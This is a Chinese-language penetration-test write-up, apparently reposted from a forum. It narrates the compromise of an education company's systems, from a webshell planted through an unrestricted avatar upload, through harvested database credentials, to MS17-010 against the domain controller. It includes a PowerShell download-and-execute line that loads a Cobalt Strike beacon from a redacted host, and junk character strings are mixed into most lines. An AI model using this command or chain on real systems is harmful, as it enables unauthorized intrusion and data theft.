2 U/ F1 `4 L, o& u
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
, B& n8 s( ~6 r0 [3 Y" O- w 1 ~7 j) j* q7 W
' P: L( x4 p! y; W
/ A$ |3 T/ [6 D. U- ~3 N; U + k S5 E$ p; U/ P. ~# c
8 P& Z- a1 S( t% L8 q+ y% I3 P5 | 正文
: C/ }& I. z: M& w
3 Y" I3 B( S7 x: `+ o% _) d6 K. |. k }/ H
& J6 n+ K$ ^% l- I6 ]8 I3 |
( k2 @0 j/ X% S" H
5 g' ]: h X; q& w0 J7 O+ L 目标:www.xxxx.com(一家教育机构)
. [0 r& n' p, h8 s* M' R打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
& ]$ P8 @* j. {5 `8 {* G$ N 5 L- l5 w2 s c9 ~
2 z& E5 S8 b3 F+ `/ e
+ c/ o$ a( G4 B D' _& g% ?
" r! D# [0 o( {' m( f. S
( h8 l- C( ?8 f m% \! _# v
进行了简单的信息搜集
& A2 b- n; C/ V' p1 P+ m* J
8 \% l, Q; d& y& |$ Z5 O6 k8 q/ h4 @5 B! F# x
- L1 J2 p' _- f! O
+ L! H3 Y+ u/ ?+ } 子域名搜集% A H: H: o6 r( ~5 T
6 F5 j5 b$ ]. a8 D
/ E$ A$ Z+ t3 z# F5 m4 C
# l5 O, r% k5 c* i+ g0 i
# |* t2 ]3 F% Q: ^1 i4 T$ p) p1 z* y1 X6 `
, V% a" P1 e& C3 v7 N. A fofa找资产
4 `2 D* K% Z: M2 ]* d! H - [* a! b9 |& o* S, T) g
; n) s! |) V5 a1 Z: X " S2 c: w8 ]0 ]# F
( y4 h: V/ E( Y9 Z4 F
4 q1 e: }8 K# }7 m3 C; V4 @ . E! d( V# @' j" e9 x
- j- L. Z0 y+ z( l
一共七个资产。去重之后只有两个。 8 o3 z- n- t- ~* F- a9 V/ S! {
* T, _% x/ h# |; T7 R% B
& I2 Q3 b# T4 O/ U; J
2 g6 Q( c O. }2 |; i" i
- p) m' t- J. |6 Y4 h) n6 R
目录探测
- A) N1 @+ w; c6 y* C# E2 A* e
4 H: {/ T* i: r6 j; l! j e1 i5 h- B5 R9 Y7 c; N
: f4 v+ y2 k+ L7 X+ u
3 X% ?# |( v7 n* h) p& W- C" M B8 o( g# R+ w1 d7 K
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 4 o& d! w4 Q/ ~: ]2 Z
. V9 H& ?1 b T# ^5 v8 U, A) _5 Q
+ b( @1 U4 ?! i; R2 e `3 {" a ; ?, ?+ v% s4 r( p8 k$ X, ~
9 j+ L# S5 M) [9 V) j) ~* m 我又尝试了通过修改返回包来绕过登录界面
- z$ ~4 g' m+ ^6 J( O3 ?( v# |
6 Q5 [1 O% j+ e5 T# s" m
% }" q5 b+ P! m" H: M
; \5 x% [0 }5 f& e Z- Q0 L # O1 z" f/ S2 [" {* S" f& y
% J$ Z* p6 a9 c- i9 i 还是不行,尝试注入无果
4 x1 Y* J& y7 |
+ G: t( u. J$ Y& M1 P1 z% Z. u. e* k2 D$ Q' P
5 Q' Z! a7 D- c$ I% H; Y
, v: o3 f6 q7 v, c
4 [3 n' G! L) l! w5 Q% v) M. G 不过我目录探测出了一处Spring信息泄露 $ _! N, d2 i/ }! ?
% o8 G1 E$ ^: Z/ K: t) _* w
# u2 H5 t' ^* y: f
6 Q7 Y+ o% L M* U/ k6 {3 p; e. o2 \' |5 }! p
4 O8 }. ~5 Z l1 A
3 k& x2 s3 ]4 x( S; X0 M& I
) n9 y" Y6 n. Q- Z" M 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
# h: o8 r1 k$ u% e: B' |
9 N, p' m" s0 Z# K/ m8 d# D; z, o' ?5 ~5 ^6 Q' k
: b2 r5 a5 W) m) p( J$ {
3 _) ?* {/ T( O3 X: _1 h
" ?8 z p: T: A9 r3 v 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 t3 t4 F, T- z5 L9 r7 _
9 k- }$ \7 t0 _7 _( }6 p# X8 v
1 \5 c5 m+ [2 u" ?: E7 a ! h- t3 P2 z. j% f! r
" @, C! w: X2 F, d2 D! K
8 ]$ h" x/ ] c' Y4 ^ 获取有些师傅到这一步就手机抓包电脑测了。
+ E) r! g% S* ]
; w# p$ G7 _+ O/ c: @6 Z& m) p( s' h
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 x' ~4 W% c L% Q
" g* \, i5 J, q2 Z+ Z9 s' x
, _! F* h! x" R4 r
其中在一个公众号发现了小程序,可以进行注册。+ |. k. |: W0 C4 g# }& G. y+ I
% P5 G: Z R; F
- v( ^/ F5 N- u P: N: C O 看到了头像上传,尝试上传获取WebShell# @* y9 d$ L5 m& p" A2 |! R7 o
! Z! B9 _& B6 O
; o3 S n& z( \
* S/ a4 }7 S# F o& q4 M3 X! Y2 x
1 f" r. Y5 X) O9 X1 m' T3 z. `$ \6 n$ i: s- ?0 q
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问, o. d' j; y" K( |$ p( g
, `- J$ r5 y/ t1 G0 Q
3 u9 O" J2 U6 g9 ?4 o
# e' f p1 e& B* r0 H( R0 ^2 A) @5 B1 m
. P2 L9 T/ U& y; |* d$ W8 H* O7 Z
/ J5 n0 Y( U: b( v 然后上了大马
% D8 ~! b( B8 M! c
4 u( t8 H) t- A- S! M
# A! ?/ Y' T: z
/ l- Y, q: Z) | U. I' I) {# _
- g+ Z# u9 j6 f, o5 ]! L$ ~4 I9 v9 z
( v& a4 d7 y a7 P; ?+ b9 H 5 v7 v7 a, G8 u3 u
( ?4 `/ ^4 L( L6 p& z- d1 Y 通过翻找文件发现数据库账号密码- b9 ]. z! Q0 L1 d4 P7 I$ u4 v8 O
& `% J/ O: t7 D M
8 M/ Q. a* w4 C
: X' [- T9 Y! }9 I8 h4 h 9 P' r; G' \5 I" o
0 m1 X+ ~3 m, o4 }/ Y --内网渗透$ I, n& p' x+ R4 H
' [ w% a# W- j/ W& Q
8 {( J! y9 Q7 I* j/ k6 x, R l 直接通过powershell执行 cs上线
& y. }' O* h: l9 G9 ]; S4 w
2 z' s( W7 t2 K$ z7 c8 D1 L: ~) N' h8 L' m- }
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
- M" e5 G9 { P 4 L$ P" n# m) ]! v
0 c9 Z8 c7 U" v ' e/ k' Z4 n7 H3 X% e
# ^" O8 X) W/ u6 f# g( T* s' o* t
4 b+ s0 k* ^6 r# y1 I/ w& k/ I 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
! G ^* z7 h# Y" N! L! d' y H; b1 V" Z! g
4 @2 m! _9 ?# ]
3 O1 D2 J2 W& n5 {& E ) X- j" `; @ p4 h' B, Z K
^. s* C/ H) Y# s( m 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 ^8 S5 U2 p& \) K0 l T; Y$ z
) A# S& o& J9 i9 W4 Y) f 6 a4 p6 f3 d! O+ s! r
' Q0 a1 f. H; E6 q. \- t. b
0 G4 x+ R, C% T- [% @, F5 g
7 ?/ k9 h- K# ?- _7 R
) P! H* y' ~+ i; `9 {* E( m ( d2 \/ S) E7 v! b) H
$ L N D& u/ V/ W2 `% K& y
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
4 b! }" o# a1 N4 P8 E. K9 G' { {; C- M. D
9 ~& G5 p5 |: n ?6 Y7 ?
y/ d3 h/ }) I% v2 D+ y r+ g3 N' C 5 N+ `# p5 A, @5 f. r( G
# d$ {5 r5 K9 S# Z: W Q
" j1 T5 C7 Z6 z5 Z# z3 Y! P( s
g$ O. X) C" ~3 S* m
0 F' a3 H# W2 l4 U
6 c; ?8 t3 V+ e( G7 a/ ^6 |# t" c1 E
+ Z5 r$ o) D1 k% Q, w3 y
6 J2 @" I1 T( X# ?# ]( U
# Z# P h* m3 I/ A9 g {# u/ M5 Y1 P6 M/ m) K; m7 ]0 S
3 v" L- ^0 ]7 l' k" j( S' T. X
3 k7 V; a+ d; j2 A
7 N; s& P, l+ v6 @8 n8 k$ i3 ? 小结: W, P9 c9 m( g" @ S |! ]
`% B8 t- l5 n/ O$ ?
/ |4 Z& p0 M7 B1 k& E0 Y6 p
/ s$ N4 ]! g, @) Z1 f o ?7 N" G" n7 w1 v$ S6 b
* D& G5 c# u3 v8 E9 ` 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
9 u* u9 X# o( l% W 9 n" @8 k: S/ l$ O- s; M6 L
$ Q+ `2 r0 ~$ `7 B. r- p/ w
+ {8 \6 a( N: C+ \& f: e, P8 I
. C8 H# Z" z+ M$ m
, l6 U4 b, G+ k& u% }+ }% \0 o9 Y -
6 P- |2 B, }- b8 y ; Q; k F4 |& J+ D; B
; _/ C5 l) V& L) m j9 e
-
7 X8 x$ P6 x+ y" [
% ^, b4 B) [7 _
: j4 ^( P6 ^- k+ j' r: u- A2 U% ~ 3 X5 f Q$ k2 m/ p0 X$ n4 `
5 D. p3 e) x; f: O 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html8 X& p# y) B. A" i
- q/ j5 }! T' P$ A- B0 W! c) _
8 ^2 ]. ]% t+ s3 H1 l- [) ^( Z1 L
/ T: ?$ N; l! i' J3 M* @ |